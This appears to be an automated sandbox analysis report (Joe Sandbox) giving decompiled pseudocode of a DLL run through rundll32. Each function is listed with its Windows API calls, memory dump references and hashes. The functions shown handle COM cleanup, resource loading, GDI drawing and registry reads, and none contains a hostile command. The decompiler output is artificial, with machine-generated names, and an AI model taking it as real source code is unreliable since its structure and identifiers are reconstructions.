                                                                                                            						if( *((intOrPtr*)( *_t41))() >= 0) {
                                                                                                            							E10011C50( &_v56, 0, 0x20);
                                                                                                            							E10011C50( &_v24, 0, 0x10);
                                                                                                            							_t47 = _a4;
                                                                                                            							_t48 =  *((intOrPtr*)( *_t47 + 0x18))(_t47, _t58, 0x10043018, 0, 2,  &_v24, _t71 + 0xa8,  &_v56,  &_v8);
                                                                                                            							_t60 = __imp__#6;
                                                                                                            							_a8 = _t48;
                                                                                                            							if(_v52 != 0) {
                                                                                                            								 *_t60(_v52);
                                                                                                            							}
                                                                                                            							if(_v48 != 0) {
                                                                                                            								 *_t60(_v48);
                                                                                                            							}
                                                                                                            							if(_v44 != 0) {
                                                                                                            								 *_t60(_v44);
                                                                                                            							}
                                                                                                            							_t49 = _a4;
                                                                                                            							 *((intOrPtr*)( *_t49 + 8))(_t49);
                                                                                                            							if(_a8 >= 0) {
                                                                                                            								 *((intOrPtr*)(_t71 + 0xa4)) = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t39 = 0;
                                                                                                            					goto L15;
                                                                                                            				} else {
                                                                                                            					_v60 = 2;
                                                                                                            					_v56 = _t58;
                                                                                                            					_v52 = 0;
                                                                                                            					_v48 = 0;
                                                                                                            					_v44 = 0;
                                                                                                            					_v36 = 0;
                                                                                                            					_v32 = 0;
                                                                                                            					_v28 = 0;
                                                                                                            					E1000A823(_t71,  &_v60);
                                                                                                            					_t39 = _v36;
                                                                                                            					if(_t39 != 0) {
                                                                                                            						L15:
                                                                                                            						return _t39;
                                                                                                            					}
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            			}






















                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$ClearVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 3349467263-0
                                                                                                            • Opcode ID: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction ID: 552477abdee19e13ea1b462c0c8e49e77f6f834a68e9ea303e894a8b6247ec6d
                                                                                                            • Opcode Fuzzy Hash: 59934ff8b0a33592fc684abeea173d1cbe41f05f72404a74ff9e24727756a326
                                                                                                            • Instruction Fuzzy Hash: E3310571A10229BFDB04DFA5C884EDEBBB9FF08790F10811AF559A6245C770AA54CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10036A6D(intOrPtr __ecx, CHAR* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				struct HRSRC__* _t22;
                                                                                                            				signed short _t23;
                                                                                                            				void* _t24;
                                                                                                            				signed int _t29;
                                                                                                            				signed short _t31;
                                                                                                            				void* _t37;
                                                                                                            				signed short _t38;
                                                                                                            				signed short* _t47;
                                                                                                            				void* _t53;
                                                                                                            				struct HINSTANCE__* _t56;
                                                                                                            				void* _t58;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_v8 = __ecx;
                                                                                                            				_t56 =  *(E100373B5() + 0xc);
                                                                                                            				_t22 = FindResourceA(_t56, _a4, 0xf1);
                                                                                                            				if(_t22 == 0) {
                                                                                                            					L3:
                                                                                                            					_t23 = 0;
                                                                                                            				} else {
                                                                                                            					_t24 = LoadResource(_t56, _t22);
                                                                                                            					_v12 = _t24;
                                                                                                            					if(_t24 == 0) {
                                                                                                            						goto L3;
                                                                                                            					} else {
                                                                                                            						_t58 = LockResource(_t24);
                                                                                                            						if(_t58 != 0) {
                                                                                                            							_push(_t37);
                                                                                                            							_t53 = E1001F77E(( *(_t58 + 6) & 0x0000ffff) << 2);
                                                                                                            							_t29 = 0;
                                                                                                            							__eflags =  *(_t58 + 6);
                                                                                                            							if( *(_t58 + 6) > 0) {
                                                                                                            								_t7 = _t58 + 8; // 0x8
                                                                                                            								_t47 = _t7;
                                                                                                            								do {
                                                                                                            									 *(_t53 + _t29 * 4) =  *_t47 & 0x0000ffff;
                                                                                                            									_t29 = _t29 + 1;
                                                                                                            									_t47 =  &(_t47[1]);
                                                                                                            									__eflags = _t29 - ( *(_t58 + 6) & 0x0000ffff);
                                                                                                            								} while (_t29 < ( *(_t58 + 6) & 0x0000ffff));
                                                                                                            							}
                                                                                                            							_t31 = E100366B1(_t37, _v8, _t53, _t58, _t53,  *(_t58 + 6) & 0x0000ffff);
                                                                                                            							_push(_t53);
                                                                                                            							_t38 = _t31;
                                                                                                            							L1001F7A9(_t38, _t53, _t58, __eflags);
                                                                                                            							__eflags = _t38;
                                                                                                            							if(_t38 != 0) {
                                                                                                            								_t44 =  *(_t58 + 4) & 0x0000ffff;
                                                                                                            								E100368F3(_v8, ( *(_t58 + 2) & 0x0000ffff) + 7, ( *(_t58 + 4) & 0x0000ffff) + 7,  *(_t58 + 2) & 0x0000ffff, _t44);
                                                                                                            								_t38 = E1003697A(_v8, _a4);
                                                                                                            							}
                                                                                                            							FreeResource(_v12);
                                                                                                            							_t23 = _t38;
                                                                                                            						} else {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t23;
                                                                                                            			}





















                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F1), ref: 10036A87
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10036A93
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10036AA1
                                                                                                            • FreeResource.KERNEL32(?), ref: 10036B24
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction ID: 90f7a23fa8f058c3dd6ac9528b305ebca7cc9ac8441aa778f718171523645421
                                                                                                            • Opcode Fuzzy Hash: 44134f55a48ede10767db44c9c427e80920c35ed83f2e6bdb24110360ef5ff70
                                                                                                            • Instruction Fuzzy Hash: 6321B375500621AED716DFA1CC84CBBB7ECEF48642B00C429F946DB251EB30ED41DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1000BEEF(void* __edi) {
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t46;
                                                                                                            				intOrPtr _t48;
                                                                                                            				intOrPtr _t50;
                                                                                                            				signed int _t60;
                                                                                                            				void* _t63;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aec3, _t63);
                                                                                                            				_t60 = 0;
                                                                                                            				 *((intOrPtr*)(_t63 - 0x10)) = 0;
                                                                                                            				 *((intOrPtr*)(_t63 - 0x14)) = 0x10040668;
                                                                                                            				_t48 =  *((intOrPtr*)(_t63 + 8));
                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = 0;
                                                                                                            				 *(_t63 - 4) = 0;
                                                                                                            				if( *((intOrPtr*)(_t48 - 8)) == 0) {
                                                                                                            					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t48 - 0xac)) + 0x1c)) + 0x1c)));
                                                                                                            					_t35 = E10029068();
                                                                                                            					 *((intOrPtr*)(_t48 - 8)) = _t35;
                                                                                                            					if(_t35 == 0) {
                                                                                                            						goto L1;
                                                                                                            					} else {
                                                                                                            						if( *(_t63 + 0xc) != 0) {
                                                                                                            							IntersectRect(_t63 - 0x24, _t48 - 0x9c,  *(_t63 + 0xc));
                                                                                                            						} else {
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							_t60 = 0;
                                                                                                            						}
                                                                                                            						E1002935D(_t63 - 0x14, CreateRectRgnIndirect(_t63 - 0x24));
                                                                                                            						E10028ED2( *((intOrPtr*)(_t48 - 8)), _t63 - 0x14, 1);
                                                                                                            						_t50 =  *((intOrPtr*)(_t48 - 8));
                                                                                                            						if(_t50 != _t60) {
                                                                                                            							_t46 =  *((intOrPtr*)(_t50 + 4));
                                                                                                            						} else {
                                                                                                            							_t46 = 0;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x14)))) = _t46;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L1:
                                                                                                            					_t60 = 0x80004005;
                                                                                                            				}
                                                                                                            				 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t63 - 0x14)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t63 - 0x14);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
                                                                                                            				return _t60;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateH_prologIndirectRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2123978231-0
                                                                                                            • Opcode ID: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction ID: 0eb4197897c7316f9a7e31aff11a4a7e3f3024ffe359f966774616c60da486ac
                                                                                                            • Opcode Fuzzy Hash: a87c0139d17cb296c7b54c5b9e1d23ff0820d98e6926aea6deb686421628d885
                                                                                                            • Instruction Fuzzy Hash: E121397690062ADFDB01CFA4C8849AEB7B8FF08790F514166F906AB255C771AE05CFB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1002C73E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a12) {
                                                                                                            				intOrPtr _v12;
                                                                                                            				char _v16;
                                                                                                            				struct tagRECT _v32;
                                                                                                            				struct HDC__* _v44;
                                                                                                            				char _v52;
                                                                                                            				struct tagTEXTMETRICA _v108;
                                                                                                            				void* __ebp;
                                                                                                            				long _t25;
                                                                                                            				int _t35;
                                                                                                            				intOrPtr* _t40;
                                                                                                            				void* _t43;
                                                                                                            				intOrPtr _t53;
                                                                                                            				intOrPtr* _t59;
                                                                                                            				intOrPtr _t60;
                                                                                                            
                                                                                                            				_t59 = __ecx;
                                                                                                            				_push(0);
                                                                                                            				E100290F7( &_v52);
                                                                                                            				_t25 = SendMessageA( *(__ecx + 0x1c), 0x31, 0, 0);
                                                                                                            				_t43 = 0;
                                                                                                            				if(_t25 != 0) {
                                                                                                            					_t43 = E1000866D( &_v52, _t25);
                                                                                                            				}
                                                                                                            				GetTextMetricsA(_v44,  &_v108);
                                                                                                            				_t62 = _t43;
                                                                                                            				if(_t43 != 0) {
                                                                                                            					E1000866D( &_v52, _t43);
                                                                                                            				}
                                                                                                            				E10029152( &_v52, _t62);
                                                                                                            				SetRectEmpty( &_v32);
                                                                                                            				 *((intOrPtr*)( *_t59 + 0x13c))( &_v32, _a12);
                                                                                                            				 *((intOrPtr*)( *_t59 + 0x110))(0x407, 0,  &_v16);
                                                                                                            				_t35 = GetSystemMetrics(6);
                                                                                                            				_t60 =  *((intOrPtr*)(_t59 + 0x90));
                                                                                                            				_t53 = (_t35 + _v12 << 1) - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
                                                                                                            				if(_t53 < _t60) {
                                                                                                            					_t53 = _t60;
                                                                                                            				}
                                                                                                            				_t40 = _a4;
                                                                                                            				 *_t40 = 0x7fff;
                                                                                                            				 *((intOrPtr*)(_t40 + 4)) = _t53;
                                                                                                            				return _t40;
                                                                                                            			}


















                                                                                                            APIs
                                                                                                              • Part of subcall function 100290F7: __EH_prolog.LIBCMT ref: 100290FC
                                                                                                              • Part of subcall function 100290F7: GetDC.USER32(00000000), ref: 1002912A
                                                                                                            • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 1002C75B
                                                                                                            • GetTextMetricsA.GDI32(?,?), ref: 1002C779
                                                                                                            • SetRectEmpty.USER32(?), ref: 1002C798
                                                                                                            • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                                                              • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                                                            • String ID:
                                                                                                            • API String ID: 1847300772-0
                                                                                                            • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                                                            • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10034B35(intOrPtr __ecx) {
                                                                                                            				void* _v8;
                                                                                                            				char _v12;
                                                                                                            				int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				int _v24;
                                                                                                            				char* _t32;
                                                                                                            				intOrPtr _t34;
                                                                                                            				char** _t35;
                                                                                                            				signed int _t40;
                                                                                                            				char** _t44;
                                                                                                            				char* _t46;
                                                                                                            
                                                                                                            				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
                                                                                                            				_t46 =  *0x1004b390; // 0x1003d660
                                                                                                            				_v20 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_v24 = 4;
                                                                                                            				_v16 = 0;
                                                                                                            				_t35 = 0x1004b390;
                                                                                                            				if(_t46 == 0) {
                                                                                                            					L13:
                                                                                                            					RegCloseKey(0);
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					_t8 =  &(_t35[1]); // 0x1004b358
                                                                                                            					_t44 =  *_t8;
                                                                                                            					while(1) {
                                                                                                            						_t32 =  *_t44;
                                                                                                            						if(_t32 == 0) {
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
                                                                                                            							_t34 = _v20;
                                                                                                            							_t16 =  &(_t44[1]); // 0x1
                                                                                                            							_t40 =  *_t16;
                                                                                                            							if(_v12 == 0) {
                                                                                                            								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
                                                                                                            							} else {
                                                                                                            								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v12 = 0;
                                                                                                            						_v24 = 4;
                                                                                                            						_v16 = 0;
                                                                                                            						_t44 =  &(_t44[2]);
                                                                                                            					}
                                                                                                            					L11:
                                                                                                            					RegCloseKey(_v8);
                                                                                                            					_t35 =  &(_t35[2]);
                                                                                                            					_v8 = 0;
                                                                                                            				} while ( *_t35 != 0);
                                                                                                            				goto L13;
                                                                                                            			}















                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$OpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1607946009-0
                                                                                                            • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                                                            • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 37%
                                                                                                            			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                            				void* _t14;
                                                                                                            				signed int _t16;
                                                                                                            				signed int _t17;
                                                                                                            				signed int _t18;
                                                                                                            				signed int _t20;
                                                                                                            				signed int _t23;
                                                                                                            				signed int* _t31;
                                                                                                            
                                                                                                            				_t31 = _a8;
                                                                                                            				if(_t31 == 0) {
                                                                                                            					return _t14;
                                                                                                            				}
                                                                                                            				_t23 = _a4;
                                                                                                            				if((_t23 & 0x00000020) == 0) {
                                                                                                            					_t16 = (_t23 & 0x0000ffff) - 8;
                                                                                                            					__eflags = _t16;
                                                                                                            					if(_t16 == 0) {
                                                                                                            						__imp__#6( *_t31);
                                                                                                            						L16:
                                                                                                            						 *_t31 =  *_t31 & 0x00000000;
                                                                                                            						L17:
                                                                                                            						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                                                                            							__imp__CoTaskMemFree(_t31[1]);
                                                                                                            						}
                                                                                                            						return _t16;
                                                                                                            					}
                                                                                                            					_t17 = _t16 - 1;
                                                                                                            					__eflags = _t17;
                                                                                                            					if(_t17 == 0) {
                                                                                                            						L13:
                                                                                                            						_t16 =  *_t31;
                                                                                                            						__eflags = _t16;
                                                                                                            						if(_t16 == 0) {
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
                                                                                                            						goto L16;
                                                                                                            					}
                                                                                                            					_t16 = _t17 - 3;
                                                                                                            					__eflags = _t16;
                                                                                                            					if(_t16 == 0) {
                                                                                                            						__imp__#9(_t31);
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					_t18 = _t16 - 1;
                                                                                                            					__eflags = _t18;
                                                                                                            					if(_t18 == 0) {
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            					_t16 = _t18 - 0x7b;
                                                                                                            					__eflags = _t16;
                                                                                                            					if(__eflags == 0) {
                                                                                                            						E1000D03C( &_a8, __eflags, _a12);
                                                                                                            						_t20 = _a8;
                                                                                                            						__eflags = _t20;
                                                                                                            						if(_t20 != 0) {
                                                                                                            							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
                                                                                                            						}
                                                                                                            						_t16 = L1000C8E6( &_a8);
                                                                                                            					}
                                                                                                            					goto L17;
                                                                                                            				}
                                                                                                            				_t16 =  *_t31;
                                                                                                            				if(_t16 == 0) {
                                                                                                            					goto L17;
                                                                                                            				}
                                                                                                            				__imp__#16(_t16);
                                                                                                            				goto L16;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                            • String ID:
                                                                                                            • API String ID: 3253174383-0
                                                                                                            • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                                                            • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 64%
                                                                                                            			E1000C037(void* __edi) {
                                                                                                            				int _t36;
                                                                                                            				void* _t52;
                                                                                                            				intOrPtr* _t55;
                                                                                                            				void* _t56;
                                                                                                            				void* _t58;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aec3, _t58);
                                                                                                            				 *((intOrPtr*)(_t58 - 0x10)) = 0;
                                                                                                            				 *((intOrPtr*)(_t58 - 0x14)) = 0x10040668;
                                                                                                            				_t55 =  *((intOrPtr*)(_t58 + 8));
                                                                                                            				 *(_t58 - 4) = 0;
                                                                                                            				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                            					_push( *((intOrPtr*)(_t58 + 0xc)));
                                                                                                            					_t52 = E1002934F();
                                                                                                            					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
                                                                                                            					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
                                                                                                            					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
                                                                                                            					_push( *((intOrPtr*)(_t58 + 0x10)));
                                                                                                            					if(_t36 != 0) {
                                                                                                            						_push(_t52);
                                                                                                            						E1000B505( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
                                                                                                            						_t56 = 0;
                                                                                                            					} else {
                                                                                                            						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
                                                                                                            				}
                                                                                                            				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t58 - 0x14)) = 0x1003eb6c;
                                                                                                            				E100293B4(_t58 - 0x14);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
                                                                                                            				return _t56;
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EqualH_prologIntersect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227276553-0
                                                                                                            • Opcode ID: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction ID: 4a10622ef6c9ad6aa885a1ca4e3b79ad8472db7afe28fedb0a7e7fe58967940e
                                                                                                            • Opcode Fuzzy Hash: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction Fuzzy Hash: 19210B7290025DEFDB11DFA4C984D9EBBB8FF08291B11466AF906E7250D731AE11CF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				int _v8;
                                                                                                            				int _t21;
                                                                                                            				intOrPtr _t35;
                                                                                                            				int _t39;
                                                                                                            				void* _t49;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t49 = __ecx;
                                                                                                            				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                            				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                            				_v8 = _t21;
                                                                                                            				OffsetRect(__ecx + 0x28, _t39, _t21);
                                                                                                            				OffsetRect(_t49 + 0x48, _t39, _v8);
                                                                                                            				OffsetRect(_t49 + 0x38, _t39, _v8);
                                                                                                            				OffsetRect(_t49 + 0x58, _t39, _v8);
                                                                                                            				_t51 =  *((intOrPtr*)(_t49 + 0x80));
                                                                                                            				 *((intOrPtr*)(_t49 + 4)) = _a4;
                                                                                                            				 *((intOrPtr*)(_t49 + 8)) = _a8;
                                                                                                            				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
                                                                                                            					_t35 = E100301DC();
                                                                                                            				} else {
                                                                                                            					_t35 = 0;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
                                                                                                            				return E10030582(_t49, _t51, 0);
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
